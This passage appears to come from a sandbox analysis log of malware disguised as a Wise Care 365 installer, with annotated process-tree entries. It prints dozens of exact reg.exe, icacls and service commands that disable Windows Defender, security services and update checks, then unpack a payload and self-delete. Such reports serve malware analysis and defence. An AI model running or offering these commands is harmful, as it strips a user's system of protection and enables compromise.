6⤵
PID:4640

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:1088

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:4208

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:3708

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:3900

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:3276

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:1392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
6⤵
PID:892

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3428

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4976

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:4876

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1784

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:5080

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:4000

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
6⤵
PID:1104

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:2800

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1172

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:4912

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1900

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:2628

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:2564

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4388

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1884

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:2268

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:4244

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:3680

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1464

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:2352

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
6⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
6⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:3516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
6⤵
PID:552

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
6⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
6⤵
PID:3748

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:768

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:3364

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:536

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:4580

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
6⤵
PID:4356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
6⤵
PID:3360

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:972

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
6⤵
PID:2660

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4864

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:4576

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:832

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:3548

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:3992

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2148

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:5020

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3324

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:2088

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4272

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:3432

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:4160

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3548

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1172

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1392

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:228

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:2036

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3528

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:2620

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:1708

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2136

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:4464

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:2628

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:3980

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:1144

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:4348

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:3196

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1844

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3432

C:\Windows\SysWOW64\explorer.exe
explorer.exe
6⤵
- Modifies registry class
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\executer.bat" "
5⤵
PID:3152

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:1268

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e file.zip -p___________24671pwd16377pwd22378___________ -oextracted
6⤵
- Executes dropped EXE
PID:2040

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:644

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:1728

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:5116

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:4876

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:2596

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:5040

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:2100

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:1480

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:2128

C:\ProgramData\ConsoleApp\ielowutil.exe
"ielowutil.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
7⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe
"C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe"
8⤵
- Executes dropped EXE
PID:2476

C:\Users\Admin\AppData\Local\Temp\umciavi32.exe
"C:\Users\Admin\AppData\Local\Temp\umciavi32.exe"
8⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
9⤵
PID:4824

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
10⤵
- Modifies file permissions
PID:2620

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
10⤵
- Modifies file permissions
PID:2332

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
10⤵
- Modifies file permissions
PID:3240

C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe
"C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe"
8⤵
- Checks computer location settings
PID:2212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
9⤵
PID:1112

C:\Windows\system32\timeout.exe
timeout 45
10⤵
- Delays execution with timeout.exe
PID:456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "
5⤵
PID:3692

C:\Windows\SysWOW64\timeout.exe
timeout /T 90 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\ConsoleApp\"
6⤵
PID:3552

C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1896

C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"
3⤵
- Executes dropped EXE
PID:3436

C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$30206,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
1⤵
PID:4156

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3476

C:\ProgramData\ConsoleApp\kernel32.exe
